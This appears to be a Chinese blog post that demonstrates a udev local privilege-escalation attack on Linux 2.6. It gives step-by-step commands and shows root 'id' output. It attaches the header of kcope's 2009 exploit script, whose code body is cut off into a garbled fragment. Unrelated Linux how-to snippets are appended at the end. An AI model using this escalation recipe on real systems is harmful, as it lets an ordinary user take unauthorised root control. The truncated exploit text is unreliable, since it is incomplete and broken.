Linux攻防之udev漏洞演示
此漏洞针对linux2.6内核,只要有普通用户权限,即可提升root权限,开始实验吧 1、复制以下代码,保存为udev.sh,并赋予可执行权限 2、#useradd test //新建一个普通用户 3、#su - test //切换至test用户 4、#ps -ef |grep udev //查看udev id root 474 1 0 Apr09 ? 00:00:00 /sbin/udevd -d 5、#sh udev.sh 473 //执行命令,udevd的id号减1,即473 6、sh-3.2# id uid=0(root) gid=0(root) groups=506(test) 此时test已经提升至root权限 如何修复漏洞,只要升级udev就行了 #yum update udev 附代码: #!/bin/sh # Linux 2.6 # bug found by Sebastian Krahmer # # lame sploit using LD technique # by kcope in 2009 # tested on debian-etch,ubuntu,gentoo # do a 'cat /proc/net/netlink' # and set the first arg to this # script to the pid of the netlink socket # (the pid is udevd_pid - 1 most of the time) # + sploit has to be UNIX formatted text :) # + if it doesn't work the 1st time try more often # # WARNING: maybe needs some FIXUP to work flawlessly ## greetz fly out to alex,andi,adize,wY!,revo,j! and the gang cat > udev.c program.c suid.c
相关文档:
总览
用iptables -ADC 来指定链的规
则
,-A添加 -D删除 -C 修改
iptables - [RI] chain rule num rule-specification[option]
用iptables - RI 通过规则的顺序指定
iptables -D chain rule num[option]
删除指定规则
iptables -[LFZ] [chain][option]
用iptables -LFZ 链名 [选项]
iptables -[NX] chain
用 -NX ......
2009 年 4 月 23 日
本文中我们针对 Linux 上多线程编程的主要特性总结出 5 条经验,用以改善 Linux 多线程编程的习惯和避免其中的开发陷阱。在本文中,我们穿插一些 Windows 的编程用例用以对比 Linux 特性,以加深读者印象。
背景
Linux 平台上的多线程程序开发相对应其他平台(比如 Windows)的多线程 API 有一些细微 ......
1,基本操作
添加用户
useradd
删除用户
userdel
变更密码
passwd username
查看执行中进程
ps aux
ps auxf
ps
l 长格式输出;
u 按用户名和启动时间的顺序来显示进程;
j 用任务格式来显示进程;
f 用树形格式来显示进程;
......
在linux下一些常用的关机/重启命令有shutdown、halt、reboot、及init,它们都
可以达到重启系统的目的,但每个命令的内部工作过程是不同的,通过本文的介绍,希
望你可以更加灵活的运用各种关机命令。
1.shutdown
shutdown命令安全地将系统关机。 有些用户会使用直接断掉电源的方式来关闭linux,
......
大家都知道修改linux下的DNS可以直接修改/etc/resolv.conf:
root@xuanfei-desktop:~#vim /etc/resolv.conf
nameserver ip //填上你当地使用的最快DNS服务器IP地址
nameserver ip
当然也可以直接使用网络管理器修改。
但是如果你所在机构或者工作的地方必须要求你用DHCP获得自己非固定动态IP ......
